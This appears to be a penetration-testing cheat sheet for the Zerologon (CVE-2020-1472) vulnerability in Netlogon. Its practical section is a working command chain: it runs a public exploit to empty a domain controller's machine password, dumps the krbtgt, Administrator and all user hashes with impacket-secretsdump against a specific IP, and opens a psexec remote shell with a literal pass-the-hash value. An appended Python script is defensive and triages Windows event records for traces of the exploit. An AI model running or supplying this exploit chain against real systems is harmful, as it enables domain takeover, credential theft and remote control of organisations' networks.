zerologon - CVE-2020-1472
Theory
Zerologon is a vulnerability in the cryptography of Microsoft’s Netlogon process that allows an attack against Microsoft Active Directory domain controllers. Zerologon makes it possible for a hacker to impersonate any computer, including the root domain controller.
More: https://www.trendmicro.com/en_in/what-is/zerologon.html
Practical
Test for ZeroLogon Vulnerability
git clone https://github.com/SecuraBV/CVE-2020-1472.git
cd CVE-2020-1472
pip3 install -r requirements.txt
./zerologon_tester.py EXAMPLE-DC 1.2.3.4
Exploit ZeroLogon Vulnerability
git clone https://github.com/risksense/zerologon.git
cd zerologon
pip3 install -r requirements.txt
python3 set_empty_pw.py DC_NETBIOS_NAME DC_IP_ADDR
Dump Password Hashes
# Dump krbtgt user hash
sudo impacket-secretsdump -no-pass 'DC-ZEROLOGON$'@212.129.28.18 -just-dc-user krbtgt
# Dump Administrator user hash
sudo impacket-secretsdump -no-pass 'DC-ZEROLOGON$'@212.129.28.18 -just-dc-user Administrator
# Dump all user hashes
sudo impacket-secretsdump -no-pass 'DC-ZEROLOGON$'@212.129.28.18
Remote Shell
impacket-psexec Administrator@212.129.28.18 -hashes aad3b435b51404eeaad3b435b51404ee:777b1935ff37faba2b2c299288b0693b
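As an added defensive example (not code from this page or from the linked tools), the following Python triage pass runs over constructed Windows event records and flags the footprints a Zerologon test or exploit leaves on a domain controller. The event field names and the DC account inventory are assumptions; map them to your own log schema before use.

```python
"""Triage Windows event records for Zerologon (CVE-2020-1472) exploitation.

Event IDs used: 5827/5828 (Netlogon denied a vulnerable secure-channel
connection), 5829 (allowed one, deployment phase only) and 4742 (computer
account changed). Field names are simplified assumptions; map them to your
SIEM's schema before running this over real telemetry.
"""

# Assumption: inventory of domain-controller machine accounts in the forest.
DC_ACCOUNTS = {"DC01$", "DC02$"}

# Constructed sample records, not real telemetry.
SAMPLE_EVENTS = [
    # Patched DC refusing the exploit: the DC's own account asked for an
    # insecure channel, which no legitimate Windows DC ever does.
    {"EventID": 5827, "SamAccountName": "DC01$"},
    # Vulnerable connection still allowed (DC not yet in enforcement mode).
    {"EventID": 5829, "SamAccountName": "NASBOX$"},
    # What set_empty_pw leaves behind: an anonymous caller reset the DC
    # machine account password, which also breaks the DC's own secure
    # channel until the original password is restored.
    {"EventID": 4742, "SubjectUserName": "ANONYMOUS LOGON",
     "TargetUserName": "DC01$", "Changed": ["Password Last Set"]},
    # Benign: the DC rotating its own machine password.
    {"EventID": 4742, "SubjectUserName": "DC02$",
     "TargetUserName": "DC02$", "Changed": ["Password Last Set"]},
]

NETLOGON_REASONS = {5827: "vulnerable Netlogon connection denied",
                    5828: "vulnerable trust-account connection denied",
                    5829: "vulnerable Netlogon connection ALLOWED"}


def triage(events, dc_accounts):
    """Return (severity, event_id, account, reason) tuples for an analyst."""
    findings = []
    for e in events:
        eid = e["EventID"]
        if eid in NETLOGON_REASONS:
            acct = e["SamAccountName"]
            # A DC account negotiating an insecure channel is the exploit's
            # signature; a legacy NAS or printer is a patching backlog item.
            sev = "high" if acct in dc_accounts else "medium"
            findings.append((sev, eid, acct, NETLOGON_REASONS[eid]))
        elif eid == 4742:
            target = e["TargetUserName"]
            anon = e["SubjectUserName"].upper() == "ANONYMOUS LOGON"
            if target in dc_accounts and anon and "Password Last Set" in e["Changed"]:
                findings.append(("critical", eid, target,
                                 "DC machine account password reset by ANONYMOUS LOGON"))
    return findings
```

Run `triage(SAMPLE_EVENTS, DC_ACCOUNTS)` to get three findings; the benign self-rotation 4742 is dropped.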